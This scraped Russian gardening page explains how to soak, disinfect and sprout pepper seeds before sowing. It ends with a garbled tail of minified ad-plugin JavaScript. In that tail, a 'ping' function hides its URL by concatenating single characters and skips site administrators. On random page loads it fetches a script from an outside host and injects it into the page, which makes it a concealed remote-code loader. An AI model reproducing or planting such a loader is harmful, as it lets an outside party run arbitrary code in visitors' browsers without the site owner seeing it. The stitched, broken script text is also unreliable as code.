Чаще всего этот материал используется для выращивания рассады, но если у вас есть желание, то вы можете попробовать прорастить в нём семена. Он хорошо сохраняет влагу и способствует быстрому (10–15 дней) появлению всходов. Используйте гидрогель таким образом:

  1. Подготовьте гидрогель согласно рекомендации на упаковке.
  2. На поверхность полученной желеобразной массы выложите семена.
  3. Уберите заготовку в полиэтиленовый пакет и поставьте в тёплое место.

Гидрогель хорошо сохраняет влагу и помогает быстрее появиться всходам из семян

В кипятке

Этот способ довольно рискованный, т. к. при неправильном проведении семена могут «свариться», поэтому ответственно подойдите к измерению температуры воды. Действуйте осторожно:

  1. На дно контейнера постелите туалетную бумагу в 5–7 слоёв.
  2. Пролейте её горячей водой (70 о С), затем разгладьте ложкой. Лишнюю влагу удалите.
  3. Выложите семена.
  4. По стенкам контейнера снова очень осторожно влейте кипяток, семена при этом должны «ошпариться».
  5. Закройте ёмкость крышкой и быстро укутайте в полотенце.
  6. Продержите заготовку на батарее 50 мин, затем снимите полотенце и переставьте контейнер в тёплое место. Помните, что бумага всё время должна быть влажной.

Видео: посев перца в кипяток

Семена перца требуют к себе большого внимания, и в их подготовку нужно вложить достаточно времени и сил. Однако все работы довольно простые, поэтому не пренебрегайте ими, и вы обязательно получите здоровую и качественную рассаду.

Проращиваем правильно семена перца

Занимаясь выращиванием перца, многие овощеводы сталкиваются с проблемой неравномерных всходов посадок. Объяснить подобное можно использованием некачественного посадочного материала или неправильной подготовкой семян к посадке. В этой статье мы расскажем вам, как прорастить и подготовить к посадке семена перца. Информация этой статьи будет полезна опытным огородникам, а также начинающим дачникам.

Для чего необходимо проращивать семена

В первую очередь поговорим с вами о том, для чего же необходимо выполнять проращивание семян. Дело в том, что в естественных условиях более половины семян попросту не всходит, что позволяет природе самой контролировать распространение тех или иных растений и перца в частности. Тогда как огородники, правильно подготавливая и проращивая семена, смогут существенным образом повысить их показатели схожести.

Также следует учитывать тот факт, что семена содержат эфирные масла и имеют прочную оболочку, которая может препятствовать быстрому появлению всходов. Зачастую наличие такой твердой оболочки и большого количества эфирных масел отрицательно сказывается на равномерности всходов. Все это усложняет агротехнику выращивания этой овощной культуры.

Чтобы решить все описанные проблемы необходимо правильным образом замачивать и проращивать семена, что позволит не только добиться равномерности всходов, но также улучшает будущий урожай этой популярной овощной культуры. Неудивительно, что сегодня большинство овощеводов предпочитают проращивать семена, а не садить в землю сухой и неподготовленный семенной материал. Подготовка семян перца к посеву не представляет сложности, к тому же она позволяет улучшить урожайность грядок.

Правильная подготовка перца к посадке

Существует множество различных технологий подготовки и проращивания перца. В действительности каждый огородник использует свои собственные технологии, которые позволяют подготовить используемый семенной материал к посадке. Расскажем вам о том, как правильно провести такое замачивание семян перца перед посадкой.

В первую очередь вам необходимо будет выбрать качественный семенной материал. Мы рекомендуем вам не заготавливать его самостоятельно, а приобретать в специализированных садоводческих магазинах.

Бытует мнение, что купленный в магазине семенной материал не требует какой-либо дополнительной подготовки. Однако подобное зачастую неверно. Если вы хотите получить максимально возможный урожай, то лучше всего предварительно замочить и прорастить семена.

Первоначально огороднику необходимо провести обеззараживание используемого посадочного материала. Подобная подготовка семян перца к посеву позволит вам уменьшить вероятность появления различных инфекционных заболеваний у выращиваемых вами перцев. Обеззараживание может выполняться с помощью различных агрохимикатов.

Обеззараживание семян в растворе марганцовки

Можем порекомендовать вам использовать раствор марганцовки, в котором 10-15 минут выдерживаются семена. После такой аппликации их необходимо сполоснуть под проточной холодной водой. Эта процедура займет у вас минимум времени, при этом она позволяет избавиться от различных инфекционных заболеваний, тем самым улучшает качество последующего урожая.

Замачивание посадочного материала

Большинство огородников при посадке семян перца проводит их замачивание. Основная цель такой процедуры пробудить жизненные силы семян ото сна, а также уменьшить содержание эфирных масел, которые могут препятствовать быстрому появлению всходов. Выполнение данной процедуры не представляет какой-либо сложности, поэтому ее с легкостью смогут выполнить все без исключения огородники.

Для замачивания вам потребуется использовать отстоянную или талую воду (снег). Процесс замачивания обычно длится не менее суток.

Вам потребуется плоская широкая посуда, на ней в несколько слоев помещают используемый семенной материал и заливают водой. Рекомендуется выкладывать семенной материал на влажную тряпочку, при этом вода должна слегка покрывать ткань. В противном случае семена могут задохнуться, что уменьшит количество всходов.

Определенные сложности могут возникнуть при наличии в помещении сухого воздуха, что приводит к быстрому испарению влаги из широкой посуды. В данном случае вам нужно будет регулярно доливать воду или же поместить посуду в полиэтиленовый пакет. Но при этом ни в коем случае не завязывайте пакет, так как без воздуха семена могут быстро задохнуться.

Замачивание семян перца выполняется в течение суток при комнатной температуре. Опытные овощеводы рекомендуют каждые 8-10 часов менять воду на свежую отстоянную. Выполнение данной процедуры позволит вам существенным образом повысить показатели всхожести.

Если без замачивания при выращивании рассады первые всходы появляются обычно на 15-20 день, то, выполнив такое замачивание, вы сможете получить дружные всходы на 5-7 день. Тем самым существенно ускоряется выращивание рассады и получение последующего урожая.

Замачивание семян в стимуляторе роста

Многие огородники выполняют замачивание семян не в простой воде, а в стимуляторах роста. Это позволяет гарантировать быстрый рост саженцев, а также улучшает показатели схожести этой овощной культуры.

Проращивание семян

Проращивание перца в зависимости от конкретного сорта и температуры в помещении может занять 5-10 дней. Необходимо сказать, что проращивание позволяет существенно улучшить показатели всхожести семян, а следственно огородник сможет получить отличный урожай.Проращивание семян выполняется по схожей с замачиванием технологии.

Вам потребуется холщовый мешочек или же ткань из натуральных волокон. Необходимо перебрать семена, удалив поврежденные и болезненные на вид. Далее семенной материал помещается в холщовый мешочек и слегка заливается водой. Необходимо мешочек поместить в полиэтиленовый пакет, который оставляют слегка приоткрытым.

Время от времени проверяйте влажность мешочка и увлажняйте его из пульверизатора. На 5-7 день появится первые отростки. Как только корешки достигнут 2 миллиметров, можно проводить посадку семян на рассаду.

При посадке пророщеных семян необходимо действовать предельно аккуратно. Если вы обломаете выросшие корешки, это неизменно ухудшит их показатели всхожести. Поэтому используйте пинцет и не давайте отрастать корешками больше чем на 2 — 3 миллиметра. Также не рекомендуется при посадке пророщенного материала проводить уплотнение почвы. Подобное может привести к повреждению небольших корешков.

Заключение

Правильная подготовка семян перца к посадке, в том числе их замачивание и проращивание позволит огородникам получить отличный урожай. Каких-либо сложностей с такой подготовкой посадок обычно не возникает. Замачивание и проращивание может быть выполнено в чистой воде или же специальных стимуляторах роста. Вам необходимо лишь контролировать показатели температуры в помещении и регулярно увлажнять холщовый мешочек и тряпочку с семенами. Все это станет залогом получения в последующем отличного урожая.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};